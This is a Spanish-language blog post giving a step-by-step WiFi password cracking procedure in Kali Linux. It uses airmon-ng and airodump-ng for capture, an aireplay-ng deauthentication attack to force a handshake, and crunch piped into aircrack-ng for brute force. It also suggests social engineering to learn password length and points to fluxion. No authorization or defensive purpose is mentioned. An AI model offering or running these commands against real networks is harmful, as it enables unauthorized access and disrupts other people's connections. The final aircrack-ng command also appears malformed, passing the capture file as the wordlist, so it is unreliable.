



# HACER FUERZA BRUTA AL WIFI USANDO CRUNCH EN KALI LINUX

[Cread Pag](#) mayo 16, 2018

Antes de empezar quiero agradecer mucho a todas las personas que compartieron mi post anterior.



Hoy vamos aprender lo que muchas personas me han preguntado en mi vida. Cread comparte tu diccionario o muéstranos un método para hacer ataque sobre eso hacia la red. Primero quiero aclarar que puede funcionar según tu diccionario y combinación de comandos. También quiero agradecer a mi amigo ruso por haberme hecho telepatía.

Me preguntarán cual seria la cantidad necesitaría para un buen diccionario.

Te responderé siempre habrá un humano que cometa un error y deje contraseña por default solo tienes que tu hacer ingeniería social para informarte la cantidad que necesitas para hacer tu diccionario.

Ejemplo:

Mi contraseña por default tiene 6 y 8 dígitos.

Me imagino que ya a estas altura son unos máster con los comandos para hacer ataques de redes.

## PROCEDIMIENTO PARA ATAQUE:

```
airmon-ng
```

```
airmon-ng check kill wlan0
```

```
airmon-ng start wlan0
```

```
airodump-ng wlan0mon
```

```
airodump-ng -c [channel id] --write CreadPag --bssid
```

```
aireplay-ng --deauth 5 -a [bssid] -c [station id] wlan0
```

Tienes más duda? Visita mi anterior [post](#).

Ahora con este comando puedes hacer tu fuerza bruta.

```
crunch 6 8 a14 | aircrack-ng -w '/root/CreadPag.01.cap' (Tu Handshake) -e CreadPag  
(Nombre de tu red o BSSID)
```

Recuerda que primero tienes que correr los comando de crunch para hacer fuerza bruta.

Tienes más duda de crunch? [aquí](#)

Tienes problemas en capturar los handshake usa fluxion que te hará más sencillo.

Espero haberte ayudado. Y no te olvides en compartirlo. Estaré un poco desaparecido porque tengo que presentar algo en un lugar favorito. Muchas gracias por entender. Compártelo.